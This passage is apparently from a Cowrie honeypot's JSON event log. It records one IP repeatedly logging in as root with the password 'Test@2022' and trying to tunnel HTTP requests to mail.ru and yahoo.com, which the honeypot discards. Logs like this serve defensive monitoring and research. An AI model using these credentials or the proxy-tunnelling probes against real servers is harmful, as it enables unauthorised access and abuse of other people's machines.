rict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.786949Z","src_ip":"77.83.207.83","session":"5f47cef8f492"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.049412Z","src_ip":"77.83.207.83","session":"5f47cef8f492"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15079,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15079","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.102872Z","session":"5f47cef8f492"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.155567Z","src_ip":"77.83.207.83","session":"5f47cef8f492"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":20960,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20960","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.303213Z","session":"5f47cef8f492"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.356549Z","src_ip":"77.83.207.83","session":"5f47cef8f492"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":10543,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:10543","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.502953Z","session":"5f47cef8f492"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.555807Z","src_ip":"77.83.207.83","session":"5f47cef8f492"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.609577Z","src_ip":"77.83.207.83","session":"5f47cef8f492"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64270,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb96851df857","protocol":"ssh","message":"New connection: 77.83.207.83:64270 (1.2.3.4:22) [session: eb96851df857]","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.658584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.668709Z","src_ip":"77.83.207.83","session":"eb96851df857"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.709243Z","src_ip":"77.83.207.83","session":"eb96851df857"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:56.961399Z","src_ip":"77.83.207.83","session":"eb96851df857"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10306,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:10306","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.013298Z","session":"eb96851df857"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.064136Z","src_ip":"77.83.207.83","session":"eb96851df857"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7183,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7183","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.205254Z","session":"eb96851df857"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.255795Z","src_ip":"77.83.207.83","session":"eb96851df857"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":21486,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:21486","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.396649Z","session":"eb96851df857"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.446953Z","src_ip":"77.83.207.83","session":"eb96851df857"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.498343Z","src_ip":"77.83.207.83","session":"eb96851df857"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64368,"dst_ip":"1.2.3.4","dst_port":22,"session":"44e41491b90c","protocol":"ssh","message":"New connection: 77.83.207.83:64368 (1.2.3.4:22) [session: 44e41491b90c]","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.548359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.558407Z","src_ip":"77.83.207.83","session":"44e41491b90c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.599881Z","src_ip":"77.83.207.83","session":"44e41491b90c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.855947Z","src_ip":"77.83.207.83","session":"44e41491b90c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10830,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:10830","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.907964Z","session":"44e41491b90c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:57.959430Z","src_ip":"77.83.207.83","session":"44e41491b90c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":9,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:9","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.105660Z","session":"44e41491b90c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.157016Z","src_ip":"77.83.207.83","session":"44e41491b90c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":10086,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10086","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.301852Z","session":"44e41491b90c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.353436Z","src_ip":"77.83.207.83","session":"44e41491b90c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.405515Z","src_ip":"77.83.207.83","session":"44e41491b90c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64452,"dst_ip":"1.2.3.4","dst_port":22,"session":"e92e0d671c67","protocol":"ssh","message":"New connection: 77.83.207.83:64452 (1.2.3.4:22) [session: e92e0d671c67]","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.454839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.455638Z","src_ip":"77.83.207.83","session":"e92e0d671c67"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.506581Z","src_ip":"77.83.207.83","session":"e92e0d671c67"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.758382Z","src_ip":"77.83.207.83","session":"e92e0d671c67"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25600,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:25600","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.810194Z","session":"e92e0d671c67"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:58.860942Z","src_ip":"77.83.207.83","session":"e92e0d671c67"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":3894,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:3894","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.004626Z","session":"e92e0d671c67"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.054838Z","src_ip":"77.83.207.83","session":"e92e0d671c67"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":11475,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:11475","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.197002Z","session":"e92e0d671c67"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.247829Z","src_ip":"77.83.207.83","session":"e92e0d671c67"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.299790Z","src_ip":"77.83.207.83","session":"e92e0d671c67"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64536,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e5a94bb03cb","protocol":"ssh","message":"New connection: 77.83.207.83:64536 (1.2.3.4:22) [session: 6e5a94bb03cb]","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.349115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.358894Z","src_ip":"77.83.207.83","session":"6e5a94bb03cb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.400058Z","src_ip":"77.83.207.83","session":"6e5a94bb03cb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.651461Z","src_ip":"77.83.207.83","session":"6e5a94bb03cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23035,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23035","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.702908Z","session":"6e5a94bb03cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.753305Z","src_ip":"77.83.207.83","session":"6e5a94bb03cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4276,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4276","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.896692Z","session":"6e5a94bb03cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:59.947062Z","src_ip":"77.83.207.83","session":"6e5a94bb03cb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":19581,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:19581","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.088914Z","session":"6e5a94bb03cb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.139272Z","src_ip":"77.83.207.83","session":"6e5a94bb03cb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.190821Z","src_ip":"77.83.207.83","session":"6e5a94bb03cb"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64632,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec44352f9475","protocol":"ssh","message":"New connection: 77.83.207.83:64632 (1.2.3.4:22) [session: ec44352f9475]","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.240047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:00.241196Z","src_ip":"77.83.207.83","session":"ec44352f9475"}
